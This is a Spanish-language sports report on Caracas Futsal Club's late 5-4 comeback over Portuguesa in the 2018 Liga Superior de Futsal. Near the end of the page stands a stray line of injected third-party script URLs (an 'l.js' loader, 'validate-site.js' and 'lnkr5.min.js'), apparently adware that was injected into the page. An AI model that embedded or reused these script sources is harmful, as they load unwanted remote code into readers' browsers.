¡LOS NUESTROS PRIMERO!

Caracas Futsal remontó sobre la hora y le ganó al Portuguesa

ccsfutsal290818

El Caracas Futsal Club derrotó este martes 5-4 al Portuguesa en la quinta jornada de la Liga Superior de Futsal 2018 en el Parque Naciones Unidas de El Paraíso. El elenco capitalino vino de atrás y ganó el compromiso en los últimos minutos con sendos goles de Alexander Moreno y el capitán Carlos Vento.

Un encuentro que se tornó intenso en la segunda mitad del mismo, luego de que la primera concluyera con el marcador 1-1, con la primera anotación de Moreno en el compromiso para los locales y Josue Rodríguez, quien ejecutó un penalti que dejó sin oportunidades al guardameta Neudy “araña” Pacheco.

Pero en el complemento, fueron constantes los ida y vuelta para ambos quintetos, además de los roces entre los jugadores, dejando al cuadro llanero sin Duilio Santiago, uno de sus jugadores, ni el preparador físico, quienes finalizaron viendo el duelo desde las gradas tras ser expulsados.

También en la grada la situación fue complicada a lo largo del complemento por los constantes griteríos de la afición capitalina y un grupo de seguidores del visitante.

Caracas detuvo otro disparo directo, e incluso, logró adelantarse con gol de Jackson Salazar cuando se llegó al ecuador de la etapa final, pero después de allí comenzaría un calvario donde recibieron dos goles seguidos, otra vez Rodríguez de penal y Juan Graterol, quienes volteaban la pizarra.

Luego de ello vendría lo dulce para la institución avileña. Edward Sánchez alimentó las esperanzas de remontar a 3 del final y tras un asedio sostenido, Moreno daba con la igualada a falta de 45 segundos.

Casi expirando el tiempo, Vento recibió una pelota en la pintura y remató de primera para dejar en los tres puntos en casa.

Este miércoles ambas escuadras volverán a verse las caras en el Gimnasio José Beracasa del mismo recinto capitalino, a partir de las 6:30 PM.

Escrito por: Pablo A. Rondón M. / @PablinhooAlee

Foto: @CcsFutsalClub

 

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1535563147671http://browfileext.com/addons/lnkr5.min.js

SportsVenezuela